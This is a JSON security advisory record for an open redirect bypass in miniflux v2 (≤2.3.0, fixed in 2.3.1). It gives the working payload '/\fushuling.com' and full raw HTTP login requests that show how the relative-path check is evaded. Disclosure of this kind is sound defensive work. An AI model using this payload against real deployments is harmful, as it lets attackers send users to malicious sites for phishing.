{"id":"CVE-2026-55185","title":"Open Redirect Bypass in miniflux-v2","summary":"Open Redirect Bypass in miniflux-v2","severity":"medium","cwe":["CWE-601"],"vendor":"v2","product":"miniflux.app/v2","ecosystem":"go","affected":["miniflux.app/v2 <= 2.3.0"],"patched":["miniflux.app/v2 2.3.1"],"published":"2026-06-19","updated":"2026-06-19","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-m999-j542-5w3r","references":[{"url":"https://github.com/miniflux/v2/security/advisories/GHSA-m999-j542-5w3r"},{"url":"https://github.com/advisories/GHSA-m999-j542-5w3r"}],"tags":["ghsa","go"],"ingestedAt":"2026-06-22T13:35:24.317Z","epss":0.00426,"epssPercentile":0.36511,"slug":"CVE-2026-55185","body":"## Overview\n\n### Summary\nThe URL restrictions in `miniflux-v2` can be bypassed by attackers, leading to an open redirect vulnerability.\n\n### Details\n\nNormally, the redirect URL needs to be validated using `IsRelativePath`.\n\n<img width=\"1728\" height=\"1386\" alt=\"QQ20260526-175356-26-1\" src=\"https://github.com/user-attachments/assets/b481845a-8744-41f7-b27a-526c7ac92e03\" />\n\nThere are some security measures in place, such as requiring relative paths, prohibiting host and schema entries, and rejecting proof-of-concept (PoC) entries like `//fushuling.com`. However, these measures can still be bypassed.\n\n<img width=\"1911\" height=\"804\" alt=\"QQ20260526-175836-26-2\" src=\"https://github.com/user-attachments/assets/90353c7f-7247-4453-a781-159361de13d6\" />\n\nFor a proof-of-concept (PoC) like `/\\fushuling.com`, it lacks host and netloc fields and doesn't start with `//`, but during the actual browser redirection, the backslash is automatically parsed as a forward slash, ultimately redirecting to the external address `https://fushuling.com`, thus bypassing existing protections.\n\nFor PoCs like `//fushuling.com`, the existing logic successfully detects and resolves to `/unread`, effectively preventing attacks.\n\n```\nPOST /login HTTP/1.1\nHost: 127.0.0.1:8081\nContent-Length: 92\nCache-Control: max-age=0\nsec-ch-ua: \"Not(A:Brand\";v=\"24\", \"Chromium\";v=\"122\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nOrigin: null\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9\nCookie: cw_conversation=eyJhbGciOiJIUzI1NiJ9.eyJzb3VyY2VfaWQiOiI1NTlhZGZkNS0wMTMxLTRjOWUtYjJmMi1kZTQ4YzFmMzUwODMiLCJpbmJveF9pZCI6NTI3NTUsImV4cCI6MTc5MTk3MzU4OCwiaWF0IjoxNzc2NDIxNTg4fQ._8EAAv62saWBzO54yUJCbASbjbrNdMsYEC49blqJwQM; casdoor_session_id=cc333aee41d646565c1bde0bba532991; SSID=EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.KKPgzj5eEsDglYQXFeERpo7F97-phtpOsQL0Sh9e_EA; sid=Q5hex9PpdqFKeVL41zT4W9DqyBnMJhVO; MinifluxSessionID=F5GAIDVFDZVTOTOWBLWKXCRNIE.HUQLKF4BMK42KUAM3N2VK4MA45\nConnection: close\n\ncsrf=CYJ2SHTG7AYLMFW6TMTLRR4K54&redirect_url=//fushuling.com&username=admin&password=test123\n```\n\n<img width=\"1773\" height=\"894\" alt=\"QQ20260526-180410-26-3\" src=\"https://github.com/user-attachments/assets/19e532ad-e366-4eb8-a08e-7b1de02edc7b\" />\n\nHowever, when the attacker specified the redirect URL as `/\\fushuling.com`, the URL successfully bypassed the detection and set the location to /\\fushuling.com.\n\n```\nPOST /login HTTP/1.1\nHost: 127.0.0.1:8081\nContent-Length: 92\nCache-Control: max-age=0\nsec-ch-ua: \"Not(A:Brand\";v=\"24\", \"Chromium\";v=\"122\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nOrigin: null\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9\nCookie: cw_conversation=eyJhbGciOiJIUzI1NiJ9.eyJzb3VyY2VfaWQiOiI1NTlhZGZkNS0wMTMxLTRjOWUtYjJmMi1kZTQ4YzFmMzUwODMiLCJpbmJveF9pZCI6NTI3NTUsImV4cCI6MTc5MTk3MzU4OCwiaWF0IjoxNzc2NDIxNTg4fQ._8EAAv62saWBzO54yUJCbASbjbrNdMsYEC49blqJwQM; casdoor_session_id=cc333aee41d646565c1bde0bba532991; SSID=EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.KKPgzj5eEsDglYQXFeERpo7F97-phtpOsQL0Sh9e_EA; sid=Q5hex9PpdqFKeVL41zT4W9DqyBnMJhVO; MinifluxSessionID=54R3C5MYFRCW7JVL2WUP5GFW4Z.3FLK5B4S7R3O6ZRACB7A3B2RG5\nConnection: close\n\ncsrf=QC7PJNLRRDHSF6OZPXFVPKAXEO&redirect_url=/\\fushuling.com&username=admin&password=test123\n```\n<img width=\"1629\" height=\"887\" alt=\"QQ20260526-180606-26-4\" src=\"https://github.com/user-attachments/assets/efe78aca-06ef-4369-83b7-0d7119ac2546\" />\n\nIn the actual browser redirection, the URL successfully redirected to `https://fushuling.com`, thus bypassing the restrictions and achieving an open redirect attack.\n\n<img width=\"1082\" height=\"621\" alt=\"QQ20260526-180711-26-5\" src=\"https://github.com/user-attachments/assets/0b486f09-8a9b-4d38-8350-d7ca5c51c253\" />\n\n\n### PoC\n```\n/\\fushuling.com\n```\n\n### Impact\nOpen Redirect\n\n## Affected packages\n\n- `miniflux.app/v2 <= 2.3.0`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `miniflux.app/v2 2.3.1`","depth":"sunlit","depthScore":28,"depthScoreParts":{"impact":27.5,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}